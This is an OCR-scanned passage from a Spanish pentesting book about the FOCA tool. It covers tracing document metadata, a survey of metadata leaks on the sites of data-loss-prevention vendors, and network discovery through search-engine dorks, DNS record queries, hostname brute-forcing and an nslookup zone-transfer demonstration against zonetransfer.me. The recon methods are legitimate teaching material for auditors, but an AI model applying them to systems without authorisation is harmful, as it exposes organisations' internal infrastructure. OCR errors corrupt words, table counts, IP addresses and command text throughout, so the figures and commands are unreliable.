para  atacar  su  sitio,  es  decir,  el  articulo  que  pub  lie  am  os  en  el  congreso  l ADIS  2008  sob  re 
Metadata  Honeypot  -  ya  os  lo  publicare  por  aqui,  que  nunca  lo  hice  y  solo  os  deje  la  referenda 
al  mismo. 

Imagen  corporativa:  por  supuesto,  para  lo  que  lo  usamos  en  MetaShield  Protector  y 
OOAfc/aextactor,  es  decir,  quitar  todos  los  datos  sensibles  y  establecer  valores  en  metadatas 
que  sean  corporate  vos,  como  poner  el  nombre  de  !a  compania. 

Sin  embargo,  intentar  manipular  los  metadatos  para  enganar  a  un  usuario  en  un  proceso  de  pentesting 
es  mas  bien  inutiL  De  hecho,  ya  nos  encontramos  con  este  problema  en  la  primera  version  de  la 
FOCA ,  alia  por  el  ano  2008,  en  el  que  nos  preocupaba  no  el  encontrar  datos  manipulados,  sino 
inutiles  por  ser  documentos  incorporados  a  la  web  del  proceso  de  pentesting  que  habtan  llegado  alii 
por  casual idad,  por  ejemplo  unas  diapositivas  de  una  presentacion  de  un  ponente  invitado  a  unas 
conferencias,  En  ese  easo,  los  metadatas  seran  de  la  red  donde  trabaje  el  speaker  y  no  de  la  web  que 
publica  el  documento,  por  lo  tan  to  habia  que  quitado  del  proyectcu 

Para  solucionar  este  problema,  anadimos,  en  la  primera  version  de  FOCA  una  herramienta  para  el 
traceo  de  metadatos.  Es  decir,  cuando  se  hace  el  analisis  de  metadatas,  averiguar  de  que  documento 
proviene  ese  metadato.  Si  la  cosa  suena  “rara”  o  “manipulada”  o  simplcmente  es  inutil,  basta  con 
abrir  el  documento  (boton  dereeho  desde  FOCA)  revisarlo,  y  si  no  es  valido,  es  decir,  es  false  o  ha 
side  manipulado,  eliminarlo  con  el  boton  dereeho  de  la  lista  de  documentos  y  volver  a  analizar  el 
sitio.  Para  hacerlo  de  forma  eomoda,  cuando  aparece  un  me/adato,  eon  el  boton  dereeho  se  accede 
a  la  opcion  de  “documentos  donde  aparece  este  valor”,  que  lleva  al  documento  del  que  precede  el 
metaddto.  As!  el  auditor  puede  revisar  bien  el  documento,  y  descartarlo  si  fuera  falso* 
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Imagen  02.4 1 :  Opeiones  de  traceo  de  origen  de  metadata. 

Ahora  bien,  si  una  empresa  dene  2.000  document  os  y  quiere  protegerse  de  FOCA ...  ^algnien  cree 
que  es  util  manipular  un  documento  y  dejar  los  1 ,999  con  dates  reales?  Si  lo  hiciera  seria  de  neeios, 
ya  que  estaria  dejando  datos  publicos  de  su  empresa  en  Internet  por  enganar  a  FOCA .  Ademas,  si  solo 
hay  un  documento  con  informacion  sensible,  el  analista  harfa  una  revision  manual  y  concienzuda 
para  saber  si  es  falsa  o  no  esa  info.  SI  se  encuentra  una  direccion  IP  en  un  documento,  se  prueba,  se 
analiza,  y  se  mira  a  ver  si  puede  ser  utilizada  para  atacar  el  sitio.  (:,Que  no  se  puede  porque  el  dato 
es  antiguo  o  ha  sido  manipulado?  Pues  mala  suerte,  a  por  otro  posible  camino  de  entrada  en  la  red. 

Es  por  eso  que  las  empresas  utilizan  plant!  lias  de  valores  corporativos,  con  soluciones  como 
MeiaShield  Protector,  que  cambia  tod  os  los  metadatas,  pero  no  para  enganar  a  un  pen  tester,  si  no 
directamente  para  proteger  la  imagen  de  la  compahia. 

^Se  pueden  manipular  los  metadatas  de  los  documenlos?  Evidentemente,  corao  los  valores  de  un 
log,  o  las  cabeceras  de  un  mensaje  de  correo  electron  ico,  ^Eso  quiere  decir  que  sean  inutiles  para 
un  proceso  de  pentesting!  No.  De  hecho  estamos  hablando  de  una  de  las  fugas  de  informacion  mas 
importantes  de  muchas  empresas,  con  lo  que  es  muy  facil  sacar  informacion  jugosa  de  objetivos 
de  pentesting ,  ^Es  probable  que  alguien  hay  a  manipulado  un  metad&Xo  en  un  documento?  La 
probabilidad  es  muy  baja  en  un  proceso  de  pentesting  de  una  web  con  300  documentos,  pero  por 
supuesto,  toda  informacion  extraida  por  FOCA  siempre  debe  ser  contrastada,  como  se  hace  con  la 
into  que  devuelve  cualquier  scanner  de  seguridad. 


Cap  1 1 14 1  o  II.  And!  is  is  y  limpieza  de  Metadatas 
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Fuga  de  information  en  empresas  Meres  en  Data  Loss  Prevention 

Gartner  publico  en  2013  un  estudio  en  el  que  clasifica  a  las  empresas  mas  importantes  que  oirecen 
solueiones  de  prevencion  de  fuga  de  informacion  (Data  Loss  Prevention  o  DLP)  segun  su  posicion, 
cstrategia,  efieacia  y  liderazgo  en  el  mercado*  Desde  Eleven  Paths  quisimos  realizar  un  pequeno 
experimento  para  comprobar  si  estas  mismas  compamas  controlan  la  publicacion  de  metadatas  en 
sus  propios  servidores,  como  potencial  pun  to  de  fuga  de  infonnacion  sensible* 

Segun  el  estudio  Magic  Quadrant  for  Content-Aware  Data  l  oss  Prevention  realizado  por  la 
consultora  Gartner 9  en  el  ano  2014  mas  del  50%  de  las  empresas  utilizara  alguna  earaeterislica  en 
sus  politicas  de  seguridad  a  la  hora  de  realizar  una  prevencion  de  fuga  de  informaeion  (Data  Loss 
Prevention)  en  sus  dates  seusibles.  Sin  embargo  solo  el  30%  de  estas  dispondra  de  una  solucidn  o 
eslrategia  DLP  global  basada  en  el  contenido, 

B1  estudio  realizado  por  Gartner  determina  cuales  son  las  empresas  lideres  a  la  hora  de  realizar 
prevencion  de  fuga  de  informaeion,  estableciendo  como  faetores  de  medieion  para  generar  el 
liderazgo  indicadores  como  las  solueiones  empresariales  Content-Aware  DLP  proporcionadas,  los 
productos  DLP-Lite  ofertados  o  si  proporcionan  un  canal  DLP  para  aclarar  al  usuario  dudas  respecto 
a  determinados  cumplimientos  regulatorios,  por  ejcmplo. 


I  m  a  gen  02,42:  Grafico  de  las  empresas  lideres  en  Data  Loss  Prevention,  segun  Gartner. 
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Pentesting  con  FOCA 


^Evitan  estas  empresas  la  fuga  de  information  a  traves  de  metadatos  en  sus  propios  sistemas?  Con 
FOCA ,  se  ha  realizado  un  anal i sis  al  frontal  web  principal  de  estas  compaflias  que  aparecen  eo  el 
estudio.  A/etaS  hie  Id  se  ha  encargado  de  descargar  y  analizar  los  documentos  pub!  i  cos  expuestos  en 
la  web. 

Los  resultados  se  muestran  de  manera generica  en  la  siguiente  tabla  para  evitar  crear  una  cornpetencia 
entre  el  las.  Lo  mas  significative  si  cabe  del  estudio  es  que  absolutamente  todas  las  empresas 
estudiadas  cuentan  con  metadatas  asociados  a  los  documentos  publicos  que  exponen  en  internet 
Parece  que  estos  documentos  no  estan  siendo  sometidos  a  n  in  gun  proceso  de  limpieza  y,  per  tanto, 
son  susceptibles  de  convertirse  en  un  punto  de  fuga  de  information  confideneial  que  es  necesario 
tener  en  cuenta. 


La  siguiente  tabla  muestra  en  datos  brutos,  la  perdida  de  information  expuesta  por  cada  una  de  las 
empresas  de  seguridad. 


Empress 

NS  de 

documentos 

Usuartos 

. 

Directorios 

tmpresoras 

i 

3 

Correos 

K 

Q 

O 

Total 

metadatas 

DIP1 

1263 

528 

450 

101 

148 

28 

10 

1265 

DLP2 

1247 

323 

330 

47 

101 

10 

6 

817 

DLP3 

757 

228 

44 

10 

98 

6 

8 

394 

DLP4 

214 

93 

115 

30 

42 

0 

4 

284 

DIPS 

291 

62 

19 

6 

67 

0 

4 

158 

DLP6 

154 

18 

7 

1 

42 

0 

1 

69 

DLP7 

95 

8 

0 

0 

19 

0 

O 

27 

DLP3 

61 

20 

1 

0 

13 

0 

0 

34 

DLP9 

43 

6 

1 

0 

23 

0 

0 

30 

DIP  10 

IB 

4 

0 

0 

1? 

0 

0 

16 

Dim 

4 

1 

0 

0 

4 

0 

0 

5 

DIP12 

1 

0 

0 

0 

1 

0 

0 

1 

Image n  02.43:  Tola]  de  fuga  de  informacion  expuesta  por  las  empresas  que  proporeionan  herramientas  y  servicios  DLP. 


En  funcion  de  la  tabla  anterior,  se  ha  procedi  do  a  realizar  un  nuevo  graft  co  mostrando  la  cantidad 
de  fuga  de  informacion  producida  por  las  empresas  DLP  estudiadas.  Logicamente,  las  entidades 
analizadas  que  sufren  mas  fuga  de  informacion  a  traves  de  los  metadatas  son  las  que  tambien 
exponen  un  mayor  numero  de  documentos  publicos  en  sus  sitios  web . 

La  informacion  que  se  filtra  en  mayor  numero  de  ocasiones  a  traves  de  los  metadatos  son  en  general 
los  nombres  o  cuentas  de  usuario,  seguido  de  los  directories  intemos  desde  donde  se  generaron  los 
documentos.  Tambien  es  muy  habitual  encontrar  las  versiones  de  software  concreto  usadas  para  su 
generation.  En  eonjunto,  information  valiosa  para  un  potential  atacante. 


Capital o  If.  Anal  is  is  y  Umpieza  de  Metadatas 
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Imagcn  02,44:  Fuga  de  informacion  expuesta  por  las  empresas  que  proporcionan  herramientas  y  servicios  DLP 


Quizas  !os  metadatas  siguen  siendo  uno  de  los  grandes  olvidados  a  la  bora  de  controlar  el  flujo 
de  informacion  expuesto  cn  las  paginas  corporativas  o  simplemente  en  el  momenta  de  compart  ir 
documentos.  La  fuga  de  informacion  puede  producirse  a  difcTentes  niveles  y  a  traves  de  muchos 
frentes.  Si  bien  la  perdida,  publicaeion  no  controlada  o  exposicion  no  intencionada  de  documentos 
supone  un  cl  arc  ejempio  de  problema  que  debe  ser  evitado,  la  fuga  de  metadatas  de  los  documentos 
(aunque  sean  publicos)  no  deben  ser  menospreciados,  especialmente  en  eompanias  que  ofrecen 
soluciones  para  controlar  la  fuga  de  informacion, 

El  proceso  de  fuga  de  informacion  no  debe  observarse  como  un  unico  incidente  aislado  que  permite 
a  un  atacante  obtener  un  documento,  correo  o  informacion  sensible.  Tambien  es  un  proceso  a!  que  un 
atacante  dedicara  un  tiempo  (detemainado  por  su  mot  i  vac  ion)  para  concluir  un  ataque.  Durante  este 
estudio  del  objetivo  (y  dependiendo  dc  las  soluciones  que  implemente  y  lo  protegida  que  se  encuentre 
la  entidad)  el  atacante  recopilara  toda  la  informacion  posible  sobre  la  compama  aprovechando  todo 
tipo  de  fugas  (por  pequefias  que  pudieran  parecer)  para  eonseguir  conocer  en  profundidad  el  objetivo 
y  perpetrar  un  ataque  dirigido. 

Las  empresas  que  comereializan  productos  contra  la  fuga  de  informacibtu  deberian  tenerlo  en  cuenta 
tambien  en  sus  propios  si  stem  as,  Por  ejempio,  es  una  practica  que  ya  esta  contemplada  y  que  es  de 
obligado  cumplimiento  para  adrninistradones  publicas  segun  el  Esquema  National  de  Seguridad  o 
la  LOPD. 


Capitulo  IIL  Descubrimien to  de  la  red 
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Capitulo  IIT 

Descubrimiento  de  la  red 


En  el  capitulo  anterior  se  ha  moslrado  como  la  herramienta FOCA ,  a  traves  del  anal i sis  de  metadatas 
de  I  os  ficheros  publicados  en  Internet  puede  resultar  una  herramienta  muy  util  en  la  fase  de 
recoleccion  de  informacion  del  objetivo  dentro  de  un  test  completo  de  intrusion,  A  dia  de  hoy,  los 
metadatas  se  han  convert  do  en  una  de  las  fuentes  OSINT  (Open  Source  INTelligence)  de  consults 
imprescindible  en  cualquierperctorittg  que  se  realice,  y  otras  herramientas  conio  la  popular  Maltego 
tambien  ineorporan  ese  tipo  de  analisis  mediante  el  uso  de  lo  que  se  denomina  Transformadas.  Pero 
desde  hace  ya  bastante  tempo,  ademas  de  la  informacion  proeedente  del  analisis  de  los  metadatas 
de  los  documentos  publicos,  FOCA  incorpora  otras  muchas  fimc  ion  alidades  basadas  tambien  en  el 
uso  de  fuentes  OSINT  que  ayudan  a  un  pen/ester  no  solo  en  esta  etapa  de  Intelligence  gathering  de 
una  auditoria,  sino  para  enfocar  cl  proceso  de  exploiting  future. 

En  este  capitulo  se  van  a  estudiar  las  funcionalidades  d  efootprinting  y  At  fingerprinting  que  FOCA 
I  le  va  a  cabo  para  reahzar  el  proceso  de  Network  Discovery  y  poder  local  izar  tanto  servidores  publicos 
como  internes  a  la  red,  nombre  de  dominios  FQDN ,  nombres  de  equipos  internes  de  la  organizacion, 
direccionamiento  IP  de  equipos  y  segmentos  de  red,  asignacion  de  roles  en  los  sistemas  encontrados, 
versiones  de  sistemas  operatives  y/o  del  software  instalado  en  cada  Lino  de  ellos. 

Para  entender  como  esta  constraida  FOCA ,  hay  que  tener  presente  que  las  tecnieas  d s  footprinting 
estan  orientadas  a  la  busqueda  y  recoleccion  de  la  informacion  accessible  de  forma  pub!  ica  relacionada 
con  el  dominio  a  auditor  desde  fuentes  OSINT ,  que  puede  haber  sido  convert  da  en  datos  publicos 
de  forma  consciente  per  la  organization,  como  sucede  por  ejemplo  en  la  direccion  IP  asociada  a  un 
registro  en  un  servidor  DNS ,  o  in  consciente,  como  la  informacion  que  puede  obtenerse  de  un  banner 
HTTP  por  defecto  que  esta  siendo  Index  ado  por  una  araha  de  Internet  como  es  Shodan. 

Las  tecnieas  dz  fingerprinting,  por  su  parte,  consisten  en  recoger  aquella  informacion  que  tambien 
esta  aeeesible  publicamente  pero  que  a  priori  no  puede  observarse  y  debe  ser  descubierta  mediante 
inteligeneia  o  pruebas  previstas  que  delatan  su  existencia.  Es  decir,  se  trata  de  inferir  informacion 
a  partir  de  pruebas  o  datos  previamente  reeogidos  que  se  realizan  a  cada  uno  de  los  servicios  y 
servidores  del  dominio  objetivo  para  intentar  descubrir  mas  informacion,  como  roles  o  tecnologias. 

Todas  estas  funcionalidades  pueden  encontrarse  y  personal  izar  se  en  la  seccion  Newark  del  panel 
principal  de  FOCA*  tal  y  como  se  muestra  en  la  imagen  03.01 ,  y  todo  lo  que  el  usuario  debe  hacer 
para  lanzar  el  descubrimiento  de  la  red  es  pulsar  el  boton  Start. 
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[nmgen  03,01 :  Personalizaci6n  de  opciones  del  descubrimiento  de  red. 


1.  Opciones  de  descubrimiento  de  red 

WebSearcher:  Localization  de  URLs  en  buscadores  de  Internet 

Una  de  las  opciones  que  FOCA  incorpora  para  tratar  de  deseubrir  el  mayor  numero  posible  de 
equipos  de  la  red  objetivo  es  la  de  WebSearcher 

La  idea  consiste  en  buscar  nombres  de  hosts  y  dominios  a  traves  de  la  busqueda  de  URLs  asociadas 
al  dominio  principal  en  Google  Web,  Google  API,  Ring  Web  o  Bing  API,  de  forma  que  cad  a  link  se 
analiza  para  sacar  de  el  nuevos  nombres  de  hosts  y  nombres  de  dominio. 

For  ejemplo,  en  la  imagen  03.02  se  muestra  el  resuitado  de  ejecutar  la  busqueda  “allirturk  -www 
sile:marcaxom,\  El  operador  allinurl  devuelve  todas  las  paginas  //fticxadas  de  un  dominio  indicado 
o  todas  las  paginas  que  contienen  todas  las  palabras  especificadas  en  su  wr/,  mientras  que  el  operador 
site  define  el  dominio  sobre  el  que  realizar  la  busqueda. 

En  la  consul  La  mostrada  se  le  pasa  el  valor  -  www  al  operador  allinurl ,  por  io  que  Google  devolvera 
todas  las  paginas  del  dominio  indicado  por  el  operador  site,  en  este  caso  marca.com,  que  no  contengan 
la  cadena  www,  localizando  de  este  modo  una  gran  cantidad  de  subdominios. 


Capitirfo  III .  Descftfer/'/WOT/o  la  red 
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Con  Bing  se  pueden  realizar  busquedas  simi  lares  utilizando  el  op  er  ad  or  imtreamset,  que  comprueba 
si  un  string  esta  presente  en  una  o  mas  de  las  propiedades  litulo,  cuerpo  o  url  de  una  pagina 
Index ada,  y  cl  operador  site.  La  ejecucion  de  la  busqueda  instredmset:(url):www  site:marcaxom,? 
nos  ayudaria.  por  tanto,  a  local  izar  nuevos  subdominios  y  nombres  de  hosts  del  dominio  analizado. 

Para  maximizar  el  numero  de  resullados  descubiertos,  si  el  sitio  alcanza  el  l  unite  de  resultados 
en  el  buscador,  FOCA  intentara  obtener  mks  resultados  haciendo  nuevas  busquedas  en  las  que  ira 
excluyendo  con  los  modifieadores  -imtrl  I  os  hostnames  ya  registrados. 

attinurl;  -www  site  marca. com 


Web  Im^genes  Maps  Shopping  Mas  t  Herraml&ntas  de  btisqueda 


Aproxjmadam&nte  767  £K>0  resuftadoa  (0,20  segundos) 

MARCA  social  games;  Juegos  multiiua actor  online 

soc  iaigames.  marca.conri/ 

Chatea  y  haz  amigos  en  nuestros  juegos  muitijugadof  online  Para  jugar  a  Chtnchon, 
Parch  is.  Domino,  Tuts.  Mus  y  muctios  m&s, 

MARCA.com  -  Buscamos  al  aficionado  perfecto 

perfection,  manca  com/ 

Dsmuestra  tu  paston  con  pasidn.  Buscamos  af  aficionado  perfecto  para  flsvarto  a  ta 
Eurocop  a  en  http://perfectfan.marca.oom. 

Y  el  oanador  as...  -  Escuela  de  poker  MARCA  -  aorende  a  iugar  po . . 

pokerteague .  m  arca.com/ 

31/08/2011  -  Y  d  g  enactor  es...  Te  press  marries  Fdker  League,  la  nueva  Itga  de  poker 
pre&entada  por  MARCA  que  te  va  a  dar  ta  oportunidad  de  partidpar ... 

BasketDudas.  Juego  de  baloncesto  qratuito  online 

bas  k  deludes  m  area,  com/ 

Basfee [Dudes  es  un  juego  muttiiugador  de  bafonceato  gratufto  en  el  que  los  usuarios 
tend  rtf  n  oportunidad  de  crear  su  propio  dub,  formar  &us  propios  equtpos  ... 

Las  lotos  de  la  aficion  del  Valladolid  t  Marca 

tusfotos .  marca.com/ 1 6 1 3233 1 37 

TENEMOS  LA  MEJOR  AFICION.  AHORA  TENEMOS  QUE  DEMOSTRAR  NUESTRQ 
ALIEMTO  A  NUESTROS  JUGADQRES,  A  MUERTE  CON  ELLQS  SlEMPRE,  ... _ 

Imagen  03.02:  Google  Hacking  para  local  izar  dominies  y  nombres  do  host. 


FOCA  realiza  diferentes  busquedas  para  maximizar  a  I  max  imo  la  venlana  de  1.000  resultados 
obtenibles  desde  Google  o  Bing ,  quitando  URLs  ya  obtenidas.  Eslo  le  pemite  a  FOCA  sacar  muchas 
mas  URLs  de  las  que  se  iran  analizando  los  hostnames,  se  obtendran  subdominios  del  dominio 
objetivo  principal,  y  un  monton  de  informacion  mas  desde  la  Url  que  se  analizara  en  partes 
subsiguientes  del  proeeso,  como  los  directories,  los  nombres  de  los  programas,  las  extensiones  de 
las  aplicaciones  o  los  parametros  de  llamada  de  un  procedimiento. 

Las  URLs  son  uno  de  los  elementos  necesarios  para  que  FOCA  pueda  obtener  el  maxi  mo  de 
informacion  de  un  sitio,  por  lo  que  es  una  fase  fundamental  del  proceso  de  analisis. 
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DNS 

Los  servidores  DNS  (Domain  Name  System  o  Sistema  de  N ombres  de  Dominio)  son  los  elementos 
dentro  de  la  infraestructura  de  Internet  quo  perm i ten  accede  r  a  los  recursos  de  la  red  mediante  su 
nombre  FQDN  en  lugar  de  tener  que  recordar  la  direccion  IP  de  cada  imo  de  ellos.  Por  supuesto, 
para  un  proceso  de  descubrimlento  de  infraestructura  de  un  objetivo  son  una  fuente  de  informacion 
muy  valiosa  en  cualquier  proceso  de  auditoria,  y  existen  herramientas  muy  p op u  lares  que  exprimen 
su  jugo,  como  el  popular  DNS  Recon. 

El  DNS  es  un  servtcio  basico  en  Internet  y  en  cualquier  red  local,  ya  que  a  las  personas  nos  results 
mucho  mas  sencillo  recordar  un  nombre  de  un  recurso  (como  www. Goog7e.com )  que  una  direccion 
IPv4  (como  74.1 25,230*2 1 1)  o  una  direccion  IPv6  (como  2a00: 1 450:4007:802::  1014).  Acceder  al 
contenido  del  DNS  eompleto  de  una  organizacion  daria  una  imagcn  total  y  clara  de  la  infraestructura 
del  objetivo,  por  lo  que  siempre  debe  ser  analizado  con  interes. 

La  informacion  de  los  recursos  de  un  dominio  que  mantiene  un  servidor  DNS  se  organiza  en  unos 
ficheros  llamados  mapas  dc  dominio  que  se  componen  de  diferentes  tipos  de  datos,  I  lamados  registros, 
que  identifican  a  distintos  tipos  de  recursos.  Por  ejemplo,  los  registros  NS  (Name  Server)  ahnacenan 
la  direccion  IP  y  el  nombre  de  los  serv  idores  DNS  de  un  dominio,  mientras  los  registros  de  tipo  MX 
(Mail  exchange)  guardan  los  datos  de  los  servidores  de  correo,  Los  registros  que  identifiean  a  las 
diferentes  maquinas  de  una  red  y  que  contienen  su  direccion  IPv4,  son  los  registros  A,  mientras  que 
los  que  contienen  la  direccion  IPv6  son  los  registros  A  AAA. 

FOCA  utiliza  van  as  leenieas  para  intentar  obtener  nombres  y  roles  de  equipos  y  de  nuevos 
subdominios  dentro  del  dominio  auditado,  lo  que  ayudara  a  la  herramienta  a  obtener  un  mapa  dc 
la  red  objetivo.  En  primer  lugar,  FOCA  realizara  consultas  de  registros  Well-known  a  eada  dominio 
encontrado  con  el  objetivo  de  obtener  informacion  sobre  los  siguientes  tipos  de  servidores  dentro  de 
la  organizacion,  En  total  son  mas  de  70  distintos  los  huseados  en  esta  fase  del  proceso: 

-  NS  -  Registros  para  idenlifiear  los  servidores  DNS 

-  SO  A  -  Start  of  [a.  zone  of]  Authority,  Registro  principal  de  una  zona 

-  MX  -  Mail  eXchange.  Servidor  por  donde  la  organizacion  recibe  el  correo. 

SPF  —  Sender  Policy  Framework Serv  idores  de  envfo  de  correo  electronic©, 

DK1M  -  DomainKeys  Identified  Mail.  Polftiea  dc  finna  de  mensajes  de  e-mail, 

-  VoIP  Voice  over  IP  -  Servidores  para  el  envio  de  eomunicaciones  VoIP . 

1M:  Instant  Message  Servers.  Orientados  a  servicios  de  chat,  como  XMPP  o  IRC. 

-  Active  Directory:  Registros  creados  para  dar  soporte  a  los  servicios  de  Active  Directory 
K  e  r  be  ros :  R  eg  i  st  res  d  e  serv  i  c  io  Kerberos  para  autori  zae  i  6  n . 

-  LDAP:  Ubicacion  de  los  servidores  de  bases  de  datos  LDAP 

-  Web  Proxy  Autodiscovery;  Servidor  para  configurar  automaticamente  el  servicio  Proxy. 

-  SRV  records:  Otros  registros  para  serv  icios  TCP  y  UDP  en  la  organizacion. 
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Como  se  puede  ver,  uno  de  los  registros  Well-known  que  FOCA  consulta  para  tratar  de  cneontrar 
informacion  de  la  red  objetivo  es  el  registro  SOA  (Start  of  Authority).  En  este  registro  se  indica  la 
direccion  de  eorreo  del  responsable  del  dominio,  que  puede  resultar  muy  util  para  otras  fuses  de  la 
auditorla,  los  tiempos  de  actualizacion  para  los  servidores  secundarios,  el  numero  de  serie  actual, 
que  si  esta  basado  en  techas  puede  indicamos  actividad  en  la  compania  y.  entre  otros  datos,  el 
primary  master. 

El  campo  primary  master  o  Primary  Name  Server  informa  sobre  el  servidor  DNS  que  ticne  la  copia 
macstra  de  la  information  relativa  a  este  dominio  y  que,  en  el  caso  de  existir  servidores  secundarios, 
sem  el  servidor  a  consultar  para  actualizar  las  copias  del  mapa  de  dominio.  En  muchos  casos  ese 
Primary  Name  Server  es  un  servidor  no  expuesto  a  Internet,  es  dec i  is  una  maquina  que  se  encuentra 
en  una  red  mas  protegida  e  inaccesible  desde  el  exterior.  Esto,  que  a  priori  puede  parecer  una 
desventaja  a  la  hora  de  realizar  el  footprinting  de  un  dominio,  es  tambien  una  fuente  de  informacion 
muy  util  va  que  se  puede  descubrir  el  direccionamiento  de  la  red  interna  para  posteriormente  aplicar, 
por  ejemplo,  un  escaneo  de  los  registros  PTR  del  servidor  DNS  expuesto  en  Internet  con  FOCA 
coino  veremos  mas  adelante. 

En  et  siguiente  ejemplo  se  ha  utilizado  el  programa  nslookup  (disponible  tanto  en  sistemas  Microsoft 
Windows  como  GNTJ/Linux)  para  tratar  de  obtener  informacion  del  registro  SOA  del  dominio  apache, 
org.  Para  ello,  tras  lanzar  el  programa  en  rnodo  interactivo,  el  primer  paso  consiste  en  modificar  el 
tipo  de  registros  de  la  consulta  con  el  comando  set  type  (en  este  caso  se  elegira  el  tipo  SOA)  y  realizar 
una  petition  para  el  dominio  apache.org,  eon  la  que  se  obtienen,  entre  otros  datos,  el  primary  name 
server  de  este  dominio. 

>  nslookup 

>  s^t  type=soa 

>  apache; org 

Non- authoritative  answer: 

apachc.org 

prim  ant’  name  server  —  ns2.surfnet.nL 

mail  addr  —  hostmaster-2005-atpha.apache.org 

serial  =  2013032  701 

refresh  =  3000 

retry  =■  900 

expire  =  604  SOO 

_ minimum  -  3600 _ 

l  mage  n  03,03:  Obtcncr  e!  registro  SOA  de  un  dominio. 
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A  contiimacion,  como  se  desea  conoeer  la  direecion  IP  del  equipo  n s2.rmrfhet.nl,  es  necesario 
modificar  de  nuevo  el  tipo  de  registros  a  consultar  eon  la  orden  set  type ,  eligiendo  en  este  caso  el 
tipo  de  registro  A,  Y,  final  mente,  se  realiza  una  consulta  para  obtener  la  direecion  IP  de  ese  servidor 
de  nombres,  obteniendo  as i  el  directi  onamiento  privado  de  esa  red  interna,  donde  esta  alojado  este 
servidor  Primary  Name  Server. 

>  type=a 

>  ns2.surfnet.nl 

Non- authoritative  answer: 

Name:  n&2,  stir  feet  jd 

Address:  152.87,36.2 


Jinagen  03,04:  IP  del  Primary*  Name  Sender  de  apache,  org. 


Anal isis  del  DNS  con  Diccionario  y  Transferencias  dc  Zona 

Por  otra  parte,  para  in  ten  tar  conseguir  ei  maxi  mo  de  informacion  del  servidor  DNS,  la  herramienta 
FOCA  utiliza  un  fichero  de  texto  donde  se  anade  una  lista  de  nombres  de  host  comunes  como  FTP, 
pcOl,  pc02,  intranet ,  extranet,  etcetera,  y  trata  de  resolverlos  contra  los  dominios  principales  del 
proyecto  realizando  consultas  de  registros  de  tipo  A.  En  el  momento  que  se  descubra  uno  nuevo  se 
volvera  a  proceder  al  analisis  recursivo  del  mismo. 

Por  defect©,  la  lista  de  nombres  de  hosts  que  se  compmeban  es  la  misma  que  utiliza  la  herramienta 
Fierce  ,  pero  el  usuano  puede  sustituir  dicho  fichero  por  otro  diecionario  y  puede  afiadir  o  eliminar 
nombres  a  su  antojo  en  eualquier  momento  para  adaptarse  a  detemninados  entomos  en  los  que  se 
eonoce  o  sospecha  tipos  de  nombres  que  pudieran  estar  siendo  utilizados  en  el  objetivo. 

Como  ultima  fase  del  proceso  de  analisis  del  servicio  DNS  como  fuente  OSINT ,  FOCA  tratara 
tambien  de  realizar  una  transfereneia  de  zona  desde  todos  y  cada  uno  de  los  servidores  DNS  del 
objetivo  que  hayan  sido  local izados,  para  intentar  obtener  todos  los  registros  del  dominio  de  forma 
global. 

Una  transfereneia  de  zona,  que  por  definicion  es  el  proceso  por  el  que  el  contenido  de  un  archivo  de 
zona  DNS  se  copia  desde  un  servidor  DNS  principal  en  un  servidor  DNS  secundario,  solo  deberla 
poder  realizarse  desde  los  servidores  DNS  secundarios  autorizados  para  lo  que  la  organ izac ion 
debe  deiinir  un  proceso  de  autorizacion  de  seguridad  en  este  proceso.  Sin  embargo,  es  bastante 
comun  encontrarse  servidores  DNS  que  no  eontrolan  la  direecion  IP  desde  donde  se  le  solicita  la 
transfetencia  de  zona  y  en  began  todo  su  mapa  de  dominio  a  quien  se  lo  pide.  Lo  interesante  para 
el  auditor  es  que  en  este  mapa  de  dominio,  ademas  de  las  direcciones  y  nombres  de  los  servidores 
publicos  de  la  empresa,  es  probable  que  tambien  aparezean  servidores  intemos  con  sus  direcciones 
privadas. 


1 1  ITT P:  //ha .  c  kers .  org/fi  erce/ 
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Para  entender  como  tunc  ion  a  in  tern  am  erne  este  proceso,  de  nuevo  utilizando  la  herramienta 
ns  lookup,  es  posible  solicitar  una  transferencia  de  zona  a  cualquier  servidor  DNS ,  Para  ello,  en 
primer  lugar  es  neeesario  conocer  cual  es  el  servidor  de  n oinbres  del  dominio,  por  lo  que  hay  que 
modificar  el  tipo  de  registros  a  consultar  para  elegir  el  tipo Name  Server  (set  type-NS)  y  realizar  una 
consul ta  para  local izar  los  servidores  de  nombres  del  dominie  deseado, 

En  el  ejemplo  que  se  va  a  mostrar  a  continuacion  se  ha  usado  el  dominio  zonetransfer.me,  que  fue 
registrado  por  Robin  Woods  de  digininja1  para  no  tener  que  hacer  memoria  durante  sus  elases  y 
demostraciones  intentando  recordar  algun  dominio  que  permitiera  realizar  transferences  de  zona  y 
para  no  encontrarse  al  realizar  las  pruebas  que  los  adm  in  istr  adores  habian  solucionado  el  problema. 


>nslookup 

>  set  type=ns 

>  zonetransfer.me 

Non -authoritative  answer: 

zonetran sfer.  m  e  name  server  =  n  s  1 6 ,  zon ee  d  itxo  m . 

zonetrans  ter  m  e  nameserver  -  ns  1 2 .  zon  eedi  t .  com . 

Authoritative  answers  can  be  found  from: 
ns  1 2. zoneedit.com  internet  address  =  209,62.64.46 
ns  1 6 ,  zon  eedi  l  xom  i  nternet  address  =  69 .64,68.41 


Imagen  03.05:  Servidores  DAS  del  dominio  zomtransfer.me. 

Tras  obtener  ta  lista  de  los  servidores  DNS  del  dominio  auditado,  a  continuacion  hay  que  indiear 
al  programa  que  las  proximas  consultas  las  realice  contra  uno  de  estos  servidores  DNS  mediante  la 
orden  server  IP/FQDN. 

>  server  1tsl6.zoneedit.c0m 
Default  server:  nstb.zoneeditxom 
Address:  69, 64. 68. 41  #53 

Imagen  03,06:  Setcccionar  mi  servidor  para  realizar  las  consultas. 

Y  por  ultimo  hay  que  solicitar  la  transferencia  dc  zona  con  el  comando  Is  dominio.  Si  el  serv  idor 
se  encuentra  bien  configurado  el  usuario  recibira  un  mensaje  de  error  indicando  que  la  solicited  no 
es  posible,  pero  en  caso  contrario  la  salida  de  este  comando  comendra  la  informacion  dc  lodos  los 
registros  del  mapa  de  zona  de  este  dominio,  tal  y  como  se  muestra  en  ta  imagen  03.07, 


2 II TTP  ;//ww w.di  gminjax  rg 
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>  Is  zone  transfer. 

me 

zonetransfer.me. 

7200 

IN 

SOA 

ns  1 6.zoneedit.com. 

soacontact.zoneedit.com.  201 30644  !  8  2400  360  1209600  300 

zonetransfer.me. 

7200 

IN 

NS 

nsl6.zoneedit.com. 

zonetransfer.me. 

7200 

FN 

NS 

ns  1 2.zoneedi  t.com. 

zonetransfer.me. 

7200 

IN 

A 

21 7. 147. 180.1 62 

zonetransfer.me. 

7200 

m 

MX 

0  ASPMX.UGoogie.COM. 

zonetransfer.me. 

7200 

rN 
